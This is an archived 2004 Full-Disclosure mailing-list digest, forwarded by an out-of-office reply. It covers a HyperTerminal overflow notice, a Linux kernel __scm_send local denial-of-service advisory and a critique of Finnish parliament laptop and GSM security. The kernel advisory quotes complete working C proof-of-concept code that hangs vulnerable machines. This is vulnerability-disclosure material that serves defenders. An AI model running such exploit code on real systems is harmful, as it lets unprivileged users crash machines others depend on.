[Full-Disclosure] Objet :Full-Disclosure Digestq_Vol_1=2C_Issue_2116_=28De_retour_le_mardi_28_d=E9cembr?= e.)

From: Christophe Savin (christophe.savin_at_tdf.fr)
Date: 12/22/04

  • Next message: Paul Starzetz: "[Full-Disclosure] Re: Linux kernel scm_send local DoS"
    Date: Wed, 22 Dec 2004 05:27:05 +0100
    To: <full-disclosure@lists.netsys.com>

     En mon absence, toute demande concernant les réseaux doit être envoyée au mail : ars_reseaux@tdf.fr ou (ars_transpac pour tout incident lié à ce réseau)

    En cas d'urgence, Vous pouvez contacter :
      La Hot-line Réseaux : 01 49 15 32 53
      François LEVEQUE au 01 49 15 30 56
      Pascal PAINPARAY au 01 49 15 31 36.
      Bonnes fêtes de fin d'année.
      Christophe SAVIN

    >>> full-disclosure 12/19/04 18:00 >>>

    Send Full-Disclosure mailing list submissions to

    To subscribe or unsubscribe via the World Wide Web, visit
    or, via email, send a message with subject or body 'help' to

    You can reach the person managing the list at

    When replying, please edit your Subject line so it is more specific
    than "Re: Contents of Full-Disclosure digest..."

    Today's Topics:

       1. Re: HyperTerminal - Buffer Overflow In .ht File (Gregory Gilliss)
       2. [VulnDiscuss] Re: Linux kernel scm_send local DoS
          (even multiplexed)
       3. E-mail tracking finds murderess and baby in kidnap-homicide
          case. (Tamas Feher)
       4. Re: Security breach database (Willem Koenings)
       5. Insecurity in Finnish parlament (computers) (Markus Jansson)


    Message: 1
    Date: Fri, 17 Dec 2004 10:38:23 -0800
    From: Gregory Gilliss <ggilliss@netpublishing.com>
    Subject: Re: [Full-Disclosure] HyperTerminal - Buffer Overflow In .ht
    To: full-disclosure@lists.netsys.com
    Message-ID: <20041217183823.GA20342@netpublishing.com>
    Content-Type: text/plain; charset=us-ascii

    great, so while I'm using hyperterminal on my network connected machine (!)
    to update my hardware for the latest exploit, along comes someone with this
    and hacks my client laptop. Somehow I'm glad that I only use UNIX...

    -- Greg

    On or about 2004.12.15 11:59:56 +0000, Brett Moore (brett.moore@security-assessment.com) said:

    > ========================================================================
    > = HyperTerminal - Buffer Overflow In .ht File
    > =
    > = MS Bulletin posted:
    > = http://www.microsoft.com/technet/security/bulletin/MS04-043.mspx
    > =
    > = Affected Software:
    > = Microsoft Windows NT Server 4.0 SP 6a
    > = Microsoft Windows NT Server 4.0 Terminal Server Edition SP6
    > = Microsoft Windows 2000 SP4
    > = Microsoft Windows XP SP2
    > = Microsoft Windows XP 64-Bit Edition SP1
    > = Microsoft Windows XP 64-Bit Edition Version 2003
    > = Microsoft Windows Server 2003
    > = Microsoft Windows Server 2003 64-Bit Edition
    > =
    > = Public disclosure on December 15, 2004
    > ========================================================================

    Gregory A. Gilliss, CISSP                              E-mail: greg@gilliss.com
    Computer Security                             WWW: http://www.gilliss.com/greg/
    PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3
    Message: 2
    Date: Wed, 15 Dec 2004 04:23:22 +0100
    From: even multiplexed <Shadow333@gmx.at>
    Subject: [Full-Disclosure] [VulnDiscuss] Re: Linux kernel scm_send
    	local DoS
    To: security@isec.pl
    Cc: vulnwatch@vulnwatch.org, bugtraq@securityfocus.com,
    Message-ID: <41BFAE2A.7040002@gmx.at>
    Content-Type: text/plain; charset=ISO-8859-1; format=flowed
    Paul Starzetz wrote:
    >Hash: SHA1
    >Synopsis:  Linux kernel scm_send local DoS
    >Product:   Linux kernel
    >Version:   2.4 up to and including 2.4.28, 2.6 up to and including 2.6.9
    >Vendor:    http://www.kernel.org/
    >URL:       http://isec.pl/vulnerabilities/isec-0019-scm.txt
    >CVE:       CAN-2004-1016
    >Author:    Paul Starzetz <ihaquer@isec.pl>
    >Date:      Dec 14, 2004
    >A  locally  exploitable  flaw  has been found in the Linux socket layer,
    >that allows a local user to hang a vulnerable machine.
    >The Linux kernel provides a powerful socket API  to  user  applications.
    >Among other functions sockets provide an universal way for IPC and user-
    >kernel communication. The socket layer uses several  logical  sublayers.
    >One  of  the  layers,  so called auxiliary message layer (or scm layer),
    >augments the socket API by  an  universal  user-kernel  message  passing
    >capability (see recvfrom(2) for more details on auxiliary messages).
    >One  of  the  scm  message  parsing  functions  invoked  from the kernel
    >sendmsg() code is __scm_send() and suffers from a deadlock condition  if
    >carefully  prepared  auxiliary  message(s)  is  sent  to  a socket by an
    >unprivileged application.
    >We believe that the 2.4 kernel branch is not  further  exploitable.  The
    >2.6  branch  has not been extensively checked, however it may be locally
    >exploitable to gain elevated privileges due to its increased complexity.
    >See attached code.
    >Unprivileged local users may hang a vulnerable Linux machine.
    >Paul  Starzetz  <ihaquer@isec.pl>  has  identified the vulnerability and
    >performed further research. COPYING, DISTRIBUTION, AND  MODIFICATION  OF
    >This document and all the information it contains are provided "as  is",
    >for  educational  purposes  only,  without warranty of any kind, whether
    >express or implied.
    >The authors reserve the right not to be responsible for the  topicality,
    >correctness,  completeness  or  quality  of the information  provided in
    >this document. Liability claims regarding damage caused by  the  use  of
    >any  information  provided,  including  any kind of information which is
    >incomplete or incorrect, will therefore be rejected.
    > *	Linux kernel 2.4 & 2.6 __scm_send DoS
    > *	Warning! this code will hang your machine
    > *
    > *      gcc -O2 scmbang.c -o scmbang
    > *
    > *      Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
    > *
    > *
    > */
    >#define _GNU_SOURCE
    >#include <stdio.h>
    >#include <errno.h>
    >#include <sys/socket.h>
    >#include <arpa/inet.h>
    >static char buf[1024];
    >fatal (const char *msg)
    >    printf ("\n");
    >    if (!errno)
    >      {
    >	  fprintf (stderr, "FATAL: %s\n", msg);
    >      }
    >    else
    >      {
    >	  perror (msg);
    >      }
    >    printf ("\n");
    >    fflush (stdout);
    >    fflush (stderr);
    >    exit (1);
    >main (void)
    >    int s[2], r;
    >    struct sockaddr_in sin;
    >    struct msghdr *msg;
    >    struct cmsghdr *cmsg;
    >    r = socketpair (AF_UNIX, SOCK_DGRAM, 0, s);
    >    if (r < 0)
    >	fatal ("socketpair");
    >    memset (buf, 0, sizeof (buf));
    >    msg = (void *) buf;
    >    msg->msg_control = (void *) (msg + 1);
    >// make bad cmsgs
    >    cmsg = (void *) msg->msg_control;
    >    cmsg->cmsg_len = sizeof (*cmsg);
    >    cmsg->cmsg_level = 0xdeadbebe;
    >    cmsg->cmsg_type = 12;	// len after overflow on second msg
    >    cmsg++;
    >// -12 for deadlock
    >    cmsg->cmsg_len = -12;
    >    cmsg->cmsg_level = SOL_IP;
    >    msg->msg_controllen = (unsigned) (cmsg + 1) - (unsigned) msg->msg_control;
    >    r = sendmsg (s[0], msg, 0);
    >    if (r < 0)
    >	fatal ("sendmsg");
    >    printf ("\nYou lucky\n");
    >    fflush (stdout);
    >    return 0;
    >- -- 
    >Paul Starzetz
    >iSEC Security Research
    >-----BEGIN PGP SIGNATURE-----
    >Version: GnuPG v1.0.7 (GNU/Linux)
    >-----END PGP SIGNATURE-----
    Dear Ladies and Gentleman
    First of all thanks to mir Starzetz for bringing this bug to our 
    attention.i just wanted to ask if anyone has a tip for me how to 
    quickfix this bug, without actually rebuilding a patched version of the 
    id be thankful for every tip.
    i hope theres actually a way to do that, cause our customers wouldnt 
    like that system of ours to reboot:/
    Oliver Leitner
    Message: 3
    Date: Sat, 18 Dec 2004 21:13:24 +0100
    From: "Tamas Feher" <etomcat@freemail.hu>
    Subject: [Full-Disclosure] E-mail tracking finds murderess and baby in
    	kidnap-homicide case.
    To: full-disclosure@lists.netsys.com
    Message-ID: <41C49D74.29818.C2BE56@localhost>
    Content-Type: text/plain; charset=US-ASCII
    Not for the faint of heart.
    BTW I love capital punishment!
    Regards: Tamas Feher.
    Message: 4
    Date: Sun, 19 Dec 2004 00:04:06 +0200
    From: Willem Koenings <infsec@gmail.com>
    Subject: Re: [Full-Disclosure] Security breach database
    To: full-disclosure@lists.netsys.com
    Message-ID: <9b13f6c1041218140468012145@mail.gmail.com>
    Content-Type: text/plain; charset=US-ASCII
    > Looking for few interesting security breach stories...
    Something to learn from :)
    Message: 5
    Date: Sun, 19 Dec 2004 03:19:38 +0200
    From: Markus Jansson <markus.jansson@hushmail.com>
    Subject: [Full-Disclosure] Insecurity in Finnish parlament (computers)
    To: full-disclosure@lists.netsys.com
    Message-ID: <41C4D72A.2010501@hushmail.com>
    Content-Type: text/plain; charset=ISO-8859-15; format=flowed
    Short version:
    "The laptop computers used by members of parlament and their assistants 
    in here Finland have severe security holes. These laptop computers dont 
    have firewalls, file encryption and wiping tools, automatic update is 
    not turned on, operating system (WindowsXP) is on its default settings 
    for most, computers only support 802.11b WLAN which is insecure, etc. 
    etc. As a bonus, they use TeliaSonera GSM:s which are totally insecure 
    because they use COMP-128-1 and A5/1 for security. I contacted them 
    months ago but they havent bothered to answer me, nor to reporters I 
    have contacted later. Oh dear..."
    Long version:
    1. The computers do not have firewall, not even ICF enabled. Users 
    cannot even enable it themselfes, since they dont have administrative 
    permissions on the computers. Any remote-exploit vulnerability or bad 
    passphrase and BUM! The computers is hacked.
    2. The computers are mainly on default settings. They are WindowsXP. Do 
    I really need to say more about this issue and what happens from it?
    3. The computers have support for Bluetooth and it is enabled by 
    default. This leaves many attack vectors inplace that are pretty 
    numerous for me to tell you. Also, they have firewire enabled, which 
    means that as in iPod:s case, anyone with such device can walk to one of 
    these laptops and download everything inside it. Ouch.
    4. Laptops have WLAN, but it only supports the totally insecure 802.11b 
    5. Computers do not have any kind of encryption programs. All files and 
    folders are unencrypted. Even the EFS is turned off. There is no way to 
    secure personal or sensitive documents in the computer.
    6. There are no wiping tools in the computers to wipe off sensitive or 
    personal files from them.
    7. Computers do not have "Clear pagefile on shutdown" enabled, meaning 
    that sensitive data can be recovered from unwashed swapfile later on.
    8. Users do not have administrator permissions on computer so they could 
    install neccessary security programs to them. Ofcourse, there is the 
    plus side that this *should* limit the damage to the systems 
    to...well..the user (= the member of parlament or their assistants). Ouch.
    9. There are VPN connections in the computers, but it is unclear are 
    they protected against man-in-the-middle-attacks or not. My educated 
    guess is that they arent, meaning again...
    10. Its unclear are the computers set on "automatic updates" or not. My 
    educated guess is that they arent, meaning again (especially if you look 
    at the point 1 again)...ouch.
    11. Default browser is Internet Explorer, with default settings 
    ofcourse. Now, I dont have to tell you how serious security risk this 
    is, especially if you concider point 10...
    12. MEP:s etc. use TeliaSonera GSM:s. The security that TeliaSonera uses 
    is COMP-128-1 and A5/1, which are all totally insecure and can easily be 
    broken with a laptop computer etc. meaning that their conversations can 
    easily be eavesdropped. They should use COMP-128-3 and A5/3 to make it 
    13. At TeliaSonera GSM networks, there is no protection against 
    "false-basestation" techique, which easy bypass of crypto by simply 
    turning it off from the "basestation". For example, Elisa uses 
    COMP-128-3 and A5/3 and does not allow phones to turn off crypto even 
    basestation orders them to do so.
    I have contacted about this issue months ago to security personel in our 
    parlament. They havent even bothered to answer me, not to mention that 
    they would have fixed the computers security problems. So, here is it, 
    maybe they'll listen now.
    My computer security & privacy related homepage
    Use HushTools or GnuPG/PGP to encrypt any email
    before sending it to me to protect our privacy.
    Full-Disclosure mailing list
    End of Full-Disclosure Digest, Vol 1, Issue 2116
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Paul Starzetz: "[Full-Disclosure] Re: Linux kernel scm_send local DoS"

    Relevant Pages